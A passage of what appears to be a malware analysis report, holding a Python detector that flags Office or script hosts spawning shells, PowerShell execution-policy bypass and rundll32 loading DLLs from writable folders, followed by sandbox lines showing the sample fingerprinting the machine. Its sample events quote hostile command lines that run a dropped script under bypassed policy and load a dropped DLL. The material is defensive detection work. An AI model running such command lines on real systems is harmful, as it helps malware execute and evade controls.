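    r'Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & C:\Users\user\AppData\Roaming\www.ps1 Jump to behavior',
    r'Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www1.dll,ldr Jump to behavior',
    r'Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www1.dll,ldr Jump to behavior',
    r'Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\notepad.exe notepad.exe C:\Users\user\notes.txt Jump to behavior',
]

EVENT_RE = re.compile(
    r'^Source: (?P<parent>.+?) Process created: (?P<child>.+?\.exe) (?P<cmdline>.*?)(?: Jump to behavior)?$',
    re.I)
# Assumed lists: Office applications and script hosts that should not be spawning shells.
SCRIPT_HOSTS = {'winword.exe', 'excel.exe', 'powerpnt.exe', 'cscript.exe', 'wscript.exe', 'mshta.exe'}
SHELLS = {'cmd.exe', 'powershell.exe', 'rundll32.exe', 'regsvr32.exe'}
# Directories any user can write to; a DLL loaded by rundll32 from here is suspect.
WRITABLE_DIRS = ('c:\\programdata\\', '\\appdata\\', 'c:\\users\\public\\', 'c:\\windows\\temp\\')
BYPASS_RE = re.compile(r'-e[a-z]*\s+bypass', re.I)          # -ExecutionPolicy / -ep / -exec Bypass
RUNDLL_RE = re.compile(r'rundll32(?:\.exe)?\s+"?(?P<dll>[^",]+?\.dll)"?\s*,\s*(?P<export>\w+)', re.I)


def basename(path: str) -> str:
    return path.replace('/', '\\').rsplit('\\', 1)[-1].strip('"').lower()


def parse_event(line: str):
    """Split a 'Process created' report line into (parent image, child image, command line)."""
    m = EVENT_RE.match(line.strip())
    return (m.group('parent'), m.group('child'), m.group('cmdline')) if m else None


def detect(lines):
    """Apply the three rules to each parsed event; returns (rule, parent, detail) tuples."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        parent, child, cmdline = ev
        p, c = basename(parent), basename(child)
        if p in SCRIPT_HOSTS and c in SHELLS:
            findings.append(('script_host_spawns_shell', p, c))
        if c == 'powershell.exe' and BYPASS_RE.search(cmdline):
            findings.append(('powershell_policy_bypass', p, cmdline))
        m = RUNDLL_RE.search(cmdline)
        if m and any(d in m.group('dll').lower() for d in WRITABLE_DIRS):
            findings.append(('rundll32_dll_from_writable_path', p, f"{m.group('dll')}!{m.group('export')}"))
    return findings


def summarize(findings) -> Counter:
    return Counter(rule for rule, _, _ in findings)


if __name__ == '__main__':
    hits = detect(SAMPLE_EVENTS)
    for h in hits:
        print(h)
    print(dict(summarize(hits)))
```

The rundll32 rule fires twice per DLL, once on the cmd.exe /c line and once on the rundll32.exe child, which is useful for correlating the two events. The PowerShell rule keys on the policy switch rather than on www.ps1, since the script name varies between samples; in the command line above, & is PowerShell's call operator, so the dropped script is executed under the bypassed policy.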

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior